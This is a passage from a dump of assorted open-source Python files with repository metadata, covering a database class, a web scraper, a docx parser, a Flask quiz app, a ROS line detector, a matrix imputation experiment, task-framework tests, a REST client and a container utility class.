\"tile_value\": tileset_info})\n tile_saver.flush()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"higlass/clodius","sub_path":"scripts/cooler_to_tiles.py","file_name":"cooler_to_tiles.py","file_ext":"py","file_size_in_byte":8266,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"3"}
+{"seq_id":"16382869986","text":"from DBase import Conexion\nfrom DBase import Tablas\nfrom sqlalchemy import and_\n\nclass ShowDB:\n def __init__(self):\n self.con = Conexion.conexion()\n\n def alta(self,show):\n try:\n show.cantidadPuntuaciones=0\n show.puntuacionUsuariosAcumulada=0\n self.con.session.add(show)\n self.con.session.commit()\n return True\n except Exception as e:\n print(\"No se pudo dar de alta el show: \"+e)\n self.con.session.rollback()\n return False\n\n def listarShowsPorID(self,shows):\n showsEnc=[]\n for i in shows:\n show=self.con.session.query(Tablas.Show).filter(and_(Tablas.Show.idShow == i.idshow,Tablas.Show.tipo==i.tipo)).first()\n show.estado=i.estado\n show.puntuado=i.puntuado\n showsEnc.append(show)\n return showsEnc\n\n def buscarShowPorID(self,id):\n try:\n show=self.con.session.query(Tablas.Show).filter(Tablas.Show.idShow == id.idShow).first()\n return show\n except Exception as e:\n return None\n\n def buscarShowPorIdyTipo(self,show):\n try:\n show=self.con.session.query(Tablas.Show).filter(and_(Tablas.Show.idShow == show.idShow,Tablas.Show.tipo==show.tipo)).first()\n return show\n except Exception as e:\n return None\n\n def listarShows(self):\n shows = self.con.session.query(Tablas.Show).all()\n if(len(shows) == 0):\n self.con.session.close()\n return False\n else:\n self.con.session.close()\n return shows\n\n\n def puntuarShow(self,show):\n try:\n sho=self.con.session.query(Tablas.Show).filter(and_(Tablas.Show.idShow == show.idShow,Tablas.Show.tipo == show.tipo)).first()\n sho.puntuacionUsuariosAcumulada=sho.puntuacionUsuariosAcumulada+show.puntuacionUsuariosAcumulada\n sho.cantidadPuntuaciones=sho.cantidadPuntuaciones+1\n self.con.session.add(show)\n self.con.session.commit()\n return True\n except Exception as e:\n print(\"No se pudo dar de puntear el show: \"+e)\n self.con.session.rollback()\n return False\n","repo_name":"Faviobrntn/tpFinalSoporte","sub_path":"DBase/ShowDB.py","file_name":"ShowDB.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"10346184580","text":"\"\"\"\nCreated on July 6, 2020\nby Anthony Drake\n\"\"\"\n\nimport json\nimport scrapy\nfrom scrapy.spiders import Spider\nfrom ..items import TheneedledropItem\n\nclass needledropspider(Spider):\n name = 'theneedledrop'\n start_urls = ['https://www.theneedledrop.com/articles?category=Reviews']\n\n def parse(self, response):\n\n urls = response.xpath('//div[@class=\"blog-content\"]/article/header/h1/a/@href').getall()\n\n for u in urls:\n yield scrapy.Request(response.urljoin(u), self.parse_detail)\n\n next_url = response.urljoin(response.xpath('//div[@class=\"older\"]/a/@href').get())\n if next_url:\n yield scrapy.Request(url=next_url, callback=self.parse)\n\n def parse_detail(self, response):\n\n script = response.xpath('//script[@type=\"application/ld+json\"]/text()')[2].get()\n desc = json.loads(script)\n items = TheneedledropItem()\n items['url'] = desc['url']\n items['date'] = desc['datePublished']\n try:\n items['artist'] = desc['headline'].split('-')[0].strip()\n items['album'] = desc['headline'].split('-')[1].strip()\n finally:\n items['name'] = desc['headline']\n\n try:\n \titems['score'] = response.xpath('//a[contains(text(),\"/\")]/text()').get().split('/')[0]\n except:\n \titems['score'] = \"N/A\"\n\n\n items['tags'] = \" | \".join(response.xpath('//*[@class=\"entry-tags\"]/a/text()').getall())\n yield items\n","repo_name":"AntEDra/theNeedleDrop","sub_path":"TNDReviews/TNDReviews/spiders/theNeedleDropSpider.py","file_name":"theNeedleDropSpider.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25527815501","text":"from lxml.etree import _Element\nfrom docx.opc.rel import _Relationship\nfrom docx.text.paragraph import Paragraph\n\nfrom .VText import VText\n\n\nclass VHyperlink(VText):\n def __init__(self, hyperlink: _Element = None, paragraph: Paragraph = None):\n \"\"\"\n Class for links in docx\n :param hyperlink: element from paragraph\n :param paragraph: any paragraph from document to get url of link while parsing\n \"\"\"\n super(VHyperlink, self).__init__()\n self.url = \"\"\n self.raw = hyperlink\n if hyperlink is not None:\n self.parse(hyperlink, paragraph)\n\n def __str__(self):\n if self.text.endswith(\" \"):\n return f\"[{self.text[:-1]}]( {self.url} ) \"\n else:\n return f\"[{self.text}]( {self.url} )\"\n\n def to_html(self):\n \"\"\"\n Get html representation\n :return: html representation\n \"\"\"\n if len([x for x in self.url if x == \"(\" or x == \")\"]) == 0:\n if self.text.endswith(\" \"):\n return f\"{{{self.text[:-1]}}}({self.url}) \"\n else:\n return f\"{{{self.text}}}({self.url})\"\n else:\n warning = \"\"\n if self.glue_warning: # should be set if something is wrong with typograph\n warning = ' class=\"verstak_glue_warning\"'\n if self.text.endswith(\" \"):\n return f'{self.text[:-1]} '\n else:\n return f'{self.text}'\n\n def parse(self, hyperlink: _Element, paragraph: Paragraph):\n \"\"\"\n Parse element from docx paragraph\n :param hyperlink: element from docx paragraph\n :param paragraph: any paragraph with parent as document to get urls from\n :return: Markdown representation\n \"\"\"\n url_id = None\n if len(hyperlink.values()) > 0:\n url_id = hyperlink.values()[0]\n url: _Relationship = paragraph.part.rels[url_id]\n self.url = url.target_ref\n self.text = hyperlink[0].text\n self.raw = hyperlink\n return str(self)\n","repo_name":"REW1L/verstak","sub_path":"verstak_parser/VHyperlink.py","file_name":"VHyperlink.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"19815253499","text":"import secret\n\nfrom flask import Flask, render_template, jsonify, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n\n@app.route('/start', methods=['GET'])\ndef show_total():\n total = list(secret.db.users.aggregate([\n {'$group':\n {\n '_id': 'null',\n 'total': {'$sum': '$count'}\n }}\n ]))\n for count in total:\n return jsonify({'total': count})\n\n\n@app.route('/test', methods=['GET'])\ndef test_html():\n return render_template('test.html')\n\n\n@app.route('/quest', methods=['GET'])\ndef get_test():\n question = list(secret.db.questions.find({}, {'_id': False}))\n return jsonify({'quest': question})\n\n\n@app.route('/result/', methods=['GET'])\ndef get_param(mbti):\n data = secret.db.types.find_one({'type': mbti}, {'_id': False})\n # secret.db.users.update_one({'type': mbti}, {'$inc': {'count': 1}}) 패치........ㅎ......\n return jsonify({\"data\": data})\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return \"페이지가 없습니다. URL를 확인 하세요\", 404\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=5000, debug=True)\n","repo_name":"Haze-S/bbr-test","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"25512883400","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2, cv_bridge\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Image\n\nclass StopLine(object):\n def __init__(self):\n rospy.init_node(\"StopLine\")\n self.bridge = cv_bridge.CvBridge()\n cv2.namedWindow(\"Predator\", 1)\n\n rospy.Subscriber('camera2/usb_cam2/image_raw', Image, self._latestImage)\n\n self.pub = rospy.Publisher(\"/cmd_vel\", Twist, queue_size=3)\n\n self.person_distance = 1.1\n self.last_cmd_linear_x = 0\n self.last_state = 0\n self.line_detected = 0\n self.time_start = rospy.Time.now()\n\n rospy.loginfo(\"Ready to get out there and stop at the horizontal lines!\")\n rospy.spin()\n\n def _latestImage(self, data):\n kernelOpen=np.ones((5,5))\n kernelClose=np.ones((20,20))\n font=cv2.cv.InitFont(cv2.cv.CV_FONT_HERSHEY_SIMPLEX,2,0.5,0,3,1)\n image = self.bridge.imgmsg_to_cv2(data, desired_encoding='bgr8')\n dark_blue = np.array([150,90,50])\n bright_blue = np.array([255,150,100])\n mask = cv2.inRange(image, dark_blue, bright_blue)\n\n (height, width, depth) = image.shape\n\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(image, dark_blue, bright_blue)\n mask[0:400, 0:width] = 0\n mask[460:height, 0:width] = 0\n mask[400:460, 0:220] = 0\n mask[400:460, 420:width] = 0\n \n #Morphology\n maskOpen=cv2.morphologyEx(mask,cv2.MORPH_OPEN,kernelOpen)\n maskClose=cv2.morphologyEx(maskOpen,cv2.MORPH_CLOSE,kernelClose)\n maskFinal=maskClose\n conts,h=cv2.findContours(maskFinal.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\n\n #cv2.drawContours(dilation,conts,-1,(0,0,255),3)\n #line_number = 0\n for i in range(len(conts)):\n x,y,w,h=cv2.boundingRect(conts[i])\n if w*h > 3000:\n #line_number = line_number\n cv2.rectangle(image,(x,y),(x+w,y+h),(0,0,255), 2)\n self.line_detected = 1\n #cv2.cv.PutText(cv2.cv.fromarray(image), str(i+1),(x,y+h),font,(0,255,255))\n else:\n self.line_detected = 0\n cv2.imshow(\"CAM_RIGHT\", image)\n cv2.imshow(\"mask\", mask)\n cv2.waitKey(2)\n \n if self.last_state - self.line_detected > 0:\n self.time_start = rospy.Time.now()\n rospy.loginfo(self.last_state - self.line_detected)\n cmd = Twist()\n #if rospy.Time.now() - self.time_start < rospy.Duration.from_sec(2):\n # cmd.linear.x = 0\n #else:\n # cmd.linear.x = 0.12\n self.pub.publish(image[:,:,1])\n self.last_state = self.line_detected\n\nif __name__ == \"__main__\":\n try:\n run = StopLine()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"apetsiuk/Raccoon","sub_path":"quad_pkg/src/scripts/stop_line.py","file_name":"stop_line.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37997334806","text":"# advent of code 2022 day 9\nimport numpy as np\n\nwith open('day9.txt') as f:\n data = f.read().splitlines()\n\n\ndef uniqueSpotsTraveled(data):\n\n visited = set()\n visited.add((0, 0)) # starting with head\n uniqueSpots = 0\n head = np.array([0, 0])\n tail = np.array([0, 0])\n\n for i in range(len(data)):\n [direction, steps] = data[i].split()\n steps = int(steps)\n\n if direction == 'L':\n if (isTouching(head, tail)):\n visited.add(tail)\n else: # need to move tail\n pass\n\nuniqueSpotsTraveled(data)\n\ndef isTouching(head, tail):\n adjacentSpots = [np.array([1, 0]), np.array([0, 1]), np.array(\n [-1, 0]), np.array([0, -1]), np.array([1, 1]), np.array([-1, -1]), np.array([0, 0]), np.array([1, -1])]\n\n if np.subtract(head, tail) in adjacentSpots:\n return True\n\n# print(np.subtract(np.array([4, 1]), (np.array([2, 9]))))\n","repo_name":"AlexHappyCode/AdventOfCode2022","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14701391421","text":"import numpy\nfrom util.util import save_dataset_to_file, load_csv_file_into_variable, calculate_RMSE\nfrom soft_impute_impl.soft_impute import SoftImpute\nfrom sklearn.metrics import mean_absolute_error\nfrom pathlib import Path\nfrom decimal import *\n\n\nall_rmse = []\nall_mae = []\nall_pcorr = []\n\ndef generate_mask(number_of_weeks_with_known_data, test_students_ids):\n train_mask1 = generate_mask_for_known_part_of_the_semester(number_of_weeks_with_known_data)\n train_mask2 = generate_mask_for_unknown_part_of_the_semester(22 - number_of_weeks_with_known_data, test_students_ids)\n mask = numpy.append(train_mask1, values=train_mask2, axis=1)\n return mask\n\n# Function for generating first part of the mask - known data\n# Parameters: int-> number of weeks with known data\n# Returns: array -> first part of the mask\ndef generate_mask_for_known_part_of_the_semester(number_of_weeks_with_known_data):\n return numpy.full(shape=(439, number_of_weeks_with_known_data*20), fill_value=False)\n\n# Function for generating the second part of the mask that contains some missing values\n# Parameters: int -> number of weeks with some missing data\n# Returns: array -> second part of the mask, contains True for test student ids, and False for other students\ndef generate_mask_for_unknown_part_of_the_semester(number_of_weeks_with_missing_data, test_students_ids):\n mask = numpy.full(shape=(439, number_of_weeks_with_missing_data*20), fill_value=False)\n for test_student_id in test_students_ids:\n # For this student id, set all values for the last weeks that are missing to True\n mask[test_student_id, :] = True\n return mask\n\n\ndef generate_train_dataset(dataset, test_students_ids, number_of_weeks_with_known_data):\n mask = generate_mask(number_of_weeks_with_known_data, test_students_ids)\n train_dataset = numpy.copy(dataset)\n train_dataset[mask] = numpy.nan\n return train_dataset\n\ndef perform_soft_iterative_imputation(train_dataset, number_of_weeks_with_known_data, percentage_of_students_missing, test_student_ids, dataset, test_case_nr):\n clf = SoftImpute()\n clf.fit(dataset)\n train_dataset_after_soft_imputation = clf.predict(train_dataset)\n\n # Get predicted and real values \n predicted_values = []\n real_values = []\n for test_student_id in test_student_ids:\n # Predicted values are values on same positions as real but from the transformed dataset\n predicted_values.append(train_dataset_after_soft_imputation[test_student_id, number_of_weeks_with_known_data*20:])\n # Real values are values from the original matrix on positions \n # row = test student id \n # column = all starting from number_of_weeks_with_known_data*20 until the end\n real_values.append(dataset[test_student_id, number_of_weeks_with_known_data*20:])\n predicted_values = numpy.asarray(predicted_values)\n save_dataset_to_file(predicted_values, 'results/test-case-' + test_case_nr +'/'+ percentage_of_students_missing + 'p-students-missing/svd-based/predicted-values.csv')\n\n # Round predicted values\n predicted_values_rounded = numpy.copy(predicted_values)\n for i in range(0, predicted_values_rounded.shape[0]):\n predicted_values_rounded[i, :] = list(map(lambda x : abs(float(round(Decimal(str(x)), 0))), predicted_values_rounded[i, :]))\n \n save_dataset_to_file(predicted_values_rounded, 'results/test-case-' + test_case_nr +'/'+ percentage_of_students_missing + 'p-students-missing/svd-based/predicted-values-rounded.csv')\n real_values = numpy.asarray(real_values)\n save_dataset_to_file(real_values, 
'results/test-case-' + test_case_nr +'/'+ percentage_of_students_missing + 'p-students-missing/svd-based/real-values.csv')\n\n rmse_ice = calculate_RMSE(real_values.ravel(), predicted_values_rounded.ravel())\n print('Test case ' , test_case_nr, \".\", percentage_of_students_missing)\n print(\"RMSE: {:.4f}\".format(rmse_ice))\n all_rmse.append(rmse_ice)\n mae = mean_absolute_error(real_values.ravel(), predicted_values_rounded.ravel())\n print(\"MAE: {:.4f}\".format(mae))\n all_mae.append(mae)\n pcorr = numpy.corrcoef(real_values.ravel(), predicted_values.ravel())[0, 1]\n print(\"PCORR on test set: {:.4f}\".format(pcorr))\n all_pcorr.append(pcorr)\n\n\n\ndef main():\n # Define ROUND_HALF_UP as rounding strategy\n getcontext().rounding = ROUND_HALF_UP\n\n known_weeks_test_cases = [11, 8, 5, 3]\n test_case_nr = 1\n for number_of_weeks_with_known_data in known_weeks_test_cases:\n print(\"---- Starting soft iterative imputation for \", number_of_weeks_with_known_data, \" known weeks\")\n for percentage_of_students_missing in [\"30\", \"60\", \"90\"]:\n print(percentage_of_students_missing, \" % missing \")\n # Create directories for saving results\n Path(\"results/test-case-\" + str(test_case_nr) + \"/\" + percentage_of_students_missing + \"p-students-missing/svd-based\").mkdir(parents=True, exist_ok=True)\n\n test_student_ids = load_csv_file_into_variable('../results/test-student-ids-' + percentage_of_students_missing + '.csv')[0]\n test_student_ids = numpy.asarray(test_student_ids, dtype='int64')\n # Load dataset that is in form of a 2D matrix of size (nr_of_students, nr_of_errors*nr_of_weeks) -> (439, 440)\n dataset = load_csv_file_into_variable('../dataset/dataset-2d-matrix.csv')\n train_dataset = generate_train_dataset(dataset, test_student_ids, number_of_weeks_with_known_data)\n save_dataset_to_file(train_dataset, 'results/test-case-' + str(test_case_nr) +'/' + percentage_of_students_missing + 'p-students-missing/svd-based/train-dataset.csv')\n perform_soft_iterative_imputation(train_dataset, number_of_weeks_with_known_data, percentage_of_students_missing, test_student_ids, dataset, str(test_case_nr))\n test_case_nr += 1\n \n print(\"RMSE: \", list(map(lambda x : abs(float(round(Decimal(str(x)), 4))), all_rmse)))\n print(\"MAE: \", list(map(lambda x : abs(float(round(Decimal(str(x)), 4))), all_mae)))\n print(\"PCOR: \", list(map(lambda x : abs(float(round(Decimal(str(x)), 4))), all_pcorr)))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kamberovicmubina/learning-programmers-profile","sub_path":"methods/svd_based.py","file_name":"svd_based.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
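svd_based.py above pins the Decimal context to ROUND_HALF_UP before rounding predictions because Python's built-in round() uses banker's rounding on floats; the difference in two lines:

from decimal import Decimal, getcontext, ROUND_HALF_UP

getcontext().rounding = ROUND_HALF_UP
print(round(2.5))                       # 2   (banker's rounding on floats)
print(float(round(Decimal('2.5'), 0)))  # 3.0 (half-up, as in the script)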
+{"seq_id":"11934535345","text":"from unittest.mock import Mock, create_autospec, call\n\nimport pytest # noqa\n\nfrom lightflow.models.task import BaseTask, TaskState, TaskStatus\nfrom lightflow.queue import DefaultJobQueueName\nfrom lightflow.models.task_data import MultiTaskData\nfrom lightflow.models.exceptions import AbortWorkflow, StopTask, TaskReturnActionInvalid\nfrom lightflow.models.action import Action\n\n\n@pytest.fixture\ndef task():\n yield BaseTask('task-name')\n\n\nclass CeleryResultMock:\n def __init__(self, *, state=None, ready=False, failed=False):\n self.state = state\n self._ready = ready\n self._failed = failed\n self._forget_called = False\n\n def ready(self):\n return self._ready\n\n def failed(self):\n return self._failed\n\n def forget(self):\n self._forget_called = True\n\n\ndef test_base_task_properties(task):\n assert task.name == 'task-name'\n assert task.state == TaskState.Init\n assert task.queue == DefaultJobQueueName.Task\n assert task.has_to_run is False\n assert task.propagate_skip is True\n assert task.is_waiting is False\n assert task.is_running is False\n assert task.is_completed is False\n assert task.is_stopped is False\n assert task.is_aborted is False\n assert task.is_skipped is False\n assert task.celery_pending is False\n assert task.celery_completed is False\n assert task.celery_failed is False\n assert task.celery_state == 'NOT_QUEUED'\n assert task.has_celery_result is False\n\n\ndef test_base_task_skipped_setter(task):\n task.is_skipped = True\n assert task.is_skipped is True\n\n\ndef test_base_task_state_setter(task):\n task.state = TaskState.Waiting\n assert task.state == TaskState.Waiting\n\n\ndef test_base_task_celery_pending(task):\n task.celery_result = CeleryResultMock(state='PENDING')\n assert task.celery_pending is True\n\n\ndef test_base_task_celery_completed(task):\n task.celery_result = CeleryResultMock(ready=True)\n assert task.celery_completed is True\n\n\ndef test_base_task_celery_failed(task):\n task.celery_result = CeleryResultMock(failed=True)\n assert task.celery_failed is True\n\n\ndef test_base_task_celery_state(task):\n task.celery_result = CeleryResultMock(state='PENDING')\n assert task.celery_state == 'PENDING'\n\n\ndef test_base_task_clear_result(task):\n celery_result = CeleryResultMock()\n task.celery_result = celery_result\n task.clear_celery_result()\n assert celery_result._forget_called is True\n\n\ndef test_run_calls_callbacks(data_mock, store_mock, signal_mock, context_mock):\n init_cb = Mock()\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = BaseTask('task-name', callback_init=init_cb, callback_finally=finally_cb)\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb, abort_callback=abort_cb)\n assert init_cb.call_args == call(data_mock, store_mock, signal_mock, context_mock)\n assert finally_cb.call_args == call(TaskStatus.Success, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is True\n assert stop_cb.called is False\n assert abort_cb.called is False\n\n\ndef test_run_calls_callback_finally_on_error(data_mock, store_mock, signal_mock, context_mock):\n\n class FailingTask(BaseTask):\n def run(self, *args, **kwargs):\n raise Exception()\n\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = FailingTask('task-name', callback_finally=finally_cb)\n with pytest.raises(Exception):\n task._run(data_mock, store_mock, signal_mock, context_mock,\n 
success_callback=success_cb, stop_callback=stop_cb,\n abort_callback=abort_cb)\n assert finally_cb.call_args == call(TaskStatus.Error, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is False\n assert stop_cb.called is False\n assert abort_cb.called is False\n\n\ndef test_run_calls_callback_finally_on_stop_task(data_mock, store_mock, signal_mock, context_mock):\n\n class StoppingTask(BaseTask):\n def run(self, *args, **kwargs):\n raise StopTask()\n\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = StoppingTask('task-name', callback_finally=finally_cb)\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb, abort_callback=abort_cb)\n assert finally_cb.call_args == call(TaskStatus.Stopped, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is False\n assert stop_cb.called is True\n assert abort_cb.called is False\n\n\ndef test_run_calls_callback_finally_on_abort_workflow(data_mock, store_mock, signal_mock, context_mock):\n\n class AbortingTask(BaseTask):\n def run(self, *args, **kwargs):\n raise AbortWorkflow()\n\n finally_cb = Mock()\n success_cb = Mock()\n stop_cb = Mock()\n abort_cb = Mock()\n task = AbortingTask('task-name', callback_finally=finally_cb)\n task._run(data_mock, store_mock, signal_mock, context_mock,\n success_callback=success_cb, stop_callback=stop_cb, abort_callback=abort_cb)\n assert finally_cb.call_args == call(TaskStatus.Aborted, data_mock, store_mock, signal_mock, context_mock)\n assert success_cb.called is False\n assert stop_cb.called is False\n assert abort_cb.called is True\n\n\ndef test_run_handles_invalid_result(data_mock, store_mock, signal_mock, context_mock):\n\n class InvalidResultTask(BaseTask):\n def run(self, *args, **kwargs):\n return 'whoops'\n\n with pytest.raises(TaskReturnActionInvalid):\n InvalidResultTask('task-name')._run(data_mock, store_mock, signal_mock, context_mock)\n\n\ndef test_run_handles_action_response(data_mock, store_mock, signal_mock, context_mock):\n\n run_result = Action(create_autospec(MultiTaskData, instance=True))\n\n class Task(BaseTask):\n def run(self, *args, **kwargs):\n return run_result\n\n result = Task('task-name')._run(data_mock, store_mock, signal_mock, context_mock)\n assert result == run_result\n\n\ndef test_run_handles_no_data(store_mock, signal_mock, context_mock):\n result = BaseTask('task-name')._run(None, store_mock, signal_mock, context_mock)\n assert result.data is not None\n","repo_name":"AustralianSynchrotron/lightflow","sub_path":"tests/test_base_task.py","file_name":"test_base_task.py","file_ext":"py","file_size_in_byte":6382,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"3"}
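The tests above hand-roll CeleryResultMock; unittest.mock.create_autospec (already imported there) can derive a comparable stand-in from a real class while rejecting attributes the class does not define. A minimal illustration with a made-up Result class:

from unittest.mock import create_autospec

class Result:
    def ready(self):
        return False

mock_result = create_autospec(Result, instance=True)
mock_result.ready.return_value = True
assert mock_result.ready() is True
mock_result.ready.assert_called_once()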
+{"seq_id":"35384486525","text":"import json\nfrom typing import List\nimport requests\nimport sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom domain import FinantialStatements\nfrom api.type import AddFinantialStatementsRequstType\n\nHOST = os.getenv(\"TOKO_HOST\")\nPORT = os.getenv(\"TOKO_PORT\")\n\ndef addFinantialStatements(props: AddFinantialStatementsRequstType, isPrintLog: bool = False) -> FinantialStatements:\n url = \"{}:{}/company/{}/finantial\".format(HOST, PORT, props[\"companyID\"])\n result = requests.post(url, json=({\"props\": props}))\n finantialStatements: FinantialStatements = json.loads(result.content.decode('utf-8'))\n if isPrintLog:\n print(\"[addFinantialStatements] result: {}\".format(finantialStatements))\n\n return finantialStatements\n\ndef getFinantialStatementsList(companyID: int, isPrintLog: bool = False) -> List[FinantialStatements]:\n url = \"{}:{}/company/{}/finantial\".format(HOST, PORT, companyID)\n result = requests.get(url)\n finantialStatementsList: List[FinantialStatements] = json.loads(result.content.decode('utf-8'))\n if isPrintLog:\n print(\"[getFinantialStatementsList] result: {}\".format(finantialStatementsList))\n return finantialStatementsList\n\n\ndef getFinantialStatements(companyID: int, finantialID: int, isPrintLog: bool = False) -> FinantialStatements:\n url = \"{}:{}/company/{}/finantial/{}\".format(HOST, PORT, companyID, finantialID)\n result = requests.get(url)\n finantialStatements: FinantialStatements = json.loads(result.content.decode('utf-8'))\n if isPrintLog:\n print(\"[getFinantialStatements] result: {}\".format(finantialStatements))\n return finantialStatements\n\n\nif __name__ == \"__main__\":\n # addFinantialStatements(\"test\", 1, 3)\n # getFinantialStatements(1)\n getFinantialStatementsList(1)\n","repo_name":"ruritoBlogger/Ange","sub_path":"src/api/finantialStatements.py","file_name":"finantialStatements.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32772617654","text":"import torch\nimport sys\nimport numpy as np\nimport Utility as util\n\n\nclass Container:\n\n partition_sep = \"__\"\n path_sep = \":\"\n reserved_names = [\"partitions\"]\n debug = 0\n\n # Public alias method for set()\n def s(self, name, value, partition=None, path=None):\n return self.set(name, value, partition, path)\n\n # Public set method: implements all macro set operations\n def set(self, name, value, partition=None, path=None, multi_value=False):\n # set multiple values\n if multi_value and isinstance(value, list):\n # different name and partition for each value\n if isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(value) or len(name) != len(partition):\n raise ValueError(\"Name, value and partition lists must be equal length\")\n for _name, _value, _partition in zip(name, value, partition):\n self.__set(_name, _value, _partition, path)\n # different name but same or no partition for each value\n elif isinstance(name, list):\n if len(name) != len(value):\n raise ValueError(\"Name and value lists must be equal length\")\n for _name, _value in zip(name, value):\n self.__set(_name, _value, partition, path)\n # same name but different partition for each value\n elif isinstance(partition, list):\n if len(partition) != len(value):\n raise ValueError(\"Partition and value lists must be equal length\")\n for _value, _partition in zip(value, partition):\n self.__set(name, _value, _partition, path)\n else:\n raise NotImplementedError()\n # set single value for a single var under a single partition\n elif not isinstance(name, list) and not isinstance(partition, list):\n self.__set(name, value, partition, path)\n # set single value for multiple vars under multiple partitions\n elif isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(partition):\n raise ValueError(\"Name and partition lists must be equal length\")\n for _name, _partition in zip(name, partition):\n self.__set(_name, value, _partition, path)\n # set single value for multiple vars under one or no partition(s)\n elif isinstance(name, list):\n for _name in name:\n self.__set(_name, value, partition, path)\n # set single value for single var under multiple partitions\n elif isinstance(partition, list):\n for _partition in partition:\n self.__set(name, value, _partition, path)\n else:\n raise NotImplementedError()\n return self\n\n # Private set method: implements the mapping of a variable's name to its value\n # Sets a var called by \"name\", under partition \"partition\", at descendant container \"path\" to the value \"value\"\n def __set(self, name, value, partition=None, path=None):\n self.validate_types(name, value, partition, path)\n assert not self.is_reserved(name), \"Attempting to set value for reserved name \\\"%s\\\"\" % (name)\n con = self.get_container(path, True)\n if partition == \"*\":\n for _name, _value, _partition in self.get_name_value_partitions(False):\n if name == _name:\n con.__set(_name, value, _partition)\n return self\n key = self.create_key(name, partition)\n con.update_partitions(partition)\n previous = None\n if con.key_exists(key):\n previous = con.get(name, partition)\n con.__dict__[key] = value\n return previous\n\n # Public alias method for get()\n def g(self, name, partition=None, path=None, recurse=False, must_exist=True):\n return self.get(name, partition, path, recurse, must_exist)\n\n # Public get method: implements all macro get operations\n def get(self, name, partition=None, path=None, recurse=False, 
must_exist=True):\n # get single value of a single var under a single partition\n if not isinstance(name, list) and not isinstance(partition, list):\n return self.__get(name, partition, path, recurse, must_exist)\n # get values of multiple vars under multiple partitions\n elif isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(partition):\n raise ValueError(\"Name and partition lists must be equal length\")\n\n return [self.__get(_name, _partition, path, recurse, must_exist) for _name, _partition in zip(name, partition)]\n # get values of multiple vars under one or no partition(s)\n elif isinstance(name, list):\n return [self.__get(_name, partition, path, recurse, must_exist) for _name in name]\n # get values of single var under multiple partitions\n elif isinstance(partition, list):\n return [self.__get(name, _partition, path, recurse, must_exist) for _partition in partition]\n else:\n raise NotImplementedError()\n\n # Private get method: implements retrieval of a variable's value\n # Gets the value of var called by \"name\", under partition \"partition\", at descendant container \"path\"\n def __get(self, name, partition=None, path=None, recurse=False, must_exist=True):\n self.validate_types(name, None, partition, path)\n con = self.get_container(path)\n if partition == \"*\":\n value_partition_pairs = []\n for _name, _value, _partition in con.get_name_value_partitions(False):\n if name == _name:\n value_partition_pairs += [[_value, _partition]]\n return value_partition_pairs\n key = self.create_key(name, partition)\n if not con.key_exists(key):\n val = None\n if recurse:\n for key, value in self.get_key_values():\n if isinstance(value, Container):\n val = value.get(name, partition, recurse=True, must_exist=False)\n if not val is None:\n break\n if val is None and must_exist:\n raise ValueError(\"Key \\\"%s\\\" does not exist in this Container\" % (key))\n else:\n return val\n return con.__dict__[key]\n\n # Public alias method for rem()\n def r(self, name, partition=None, path=None, recurse=False, must_exist=True):\n return self.rem(name, partition, path, recurse, must_exist)\n\n # Public remove method: implements all macro remove operations\n def rem(self, name, partition=None, path=None, recurse=False, must_exist=True):\n # remove a single var under a single partition\n if not isinstance(name, list) and not isinstance(partition, list):\n return self.__rem(name, partition, path, recurse, must_exist)\n # remove multiple vars under multiple partitions\n elif isinstance(name, list) and isinstance(partition, list):\n if len(name) != len(partition):\n raise ValueError(\"Name and partition lists must be equal length\")\n\n return [self.__rem(_name, _partition, path, recurse, must_exist) for _name, _partition in zip(name, partition)]\n # remove multiple vars under one or no partition(s)\n elif isinstance(name, list):\n return [self.__rem(_name, partition, path, recurse, must_exist) for _name in name]\n # remove single var under multiple partitions\n elif isinstance(partition, list):\n return [self.__rem(name, _partition, path, recurse, must_exist) for _partition in partition]\n else:\n raise NotImplementedError()\n\n # Private remove method: implements deletion of a variable\n 